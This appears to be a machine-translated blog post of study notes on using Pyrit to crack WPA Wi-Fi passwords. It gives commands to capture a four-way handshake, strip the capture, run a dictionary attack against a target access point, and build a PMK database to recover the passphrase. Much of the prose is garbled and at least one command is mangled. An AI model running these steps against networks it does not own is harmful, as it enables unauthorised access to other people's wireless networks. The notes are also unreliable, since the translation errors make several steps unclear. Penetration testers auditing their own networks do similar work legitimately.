PYRIT strong password analysis tools (analysis using GPU) - Study Notes

Advantage:

GPU acceleration operation can be generated using PMK

Ethereal get itself supports five four-step process, with no need to get caught Airodump

Also supports the traditional reading airodump capture obtain four-step handshake

Just grab bag WAP four-way handshake process

pyrit -r wlan0mon -o wpapyrit.cap sripLive # -o generating handshake sripLive remove unwanted data packets

pyrit -r wpapyrit.cap analyze analyzed to see if there is handshake

Grasping hand may be introduced and screened packet (packet airodump caught and pyrit not the same format, data conversion is required prior to use) from airodump

-r -o pyrite wpa.cap wpapyrit.cap strip

Use a password dictionary direct analysis (slower)

pyrit -r wpapyrit.cap -i /usr/share/john/password.lst -b 00: 11: 22: 33: 44: 55 attack_passthrough # -r used handshake packet -b MAC address of the AP

Use the database to crack:

1. Check the default database status: pyrit eval 

2. Import password dictionary (automatically remove invalid password): pyrit -i password.lst import passwords

3.指定ESSID:pyrit -e TP_Link722  create essid

4. Calculate the PMK: pyrit batch (enabled by default GPU)

5. Analysis Password: pyrit -r wpapyrit.cap -b 00: 11: 22: 33: 44: 55 attack.db

Get the final password:

 

 

 

 

 

 

 

Published 38 original articles · won praise 10 · Views 100,000 +

Guess you like

Origin blog.csdn.net/winux123/article/details/103247899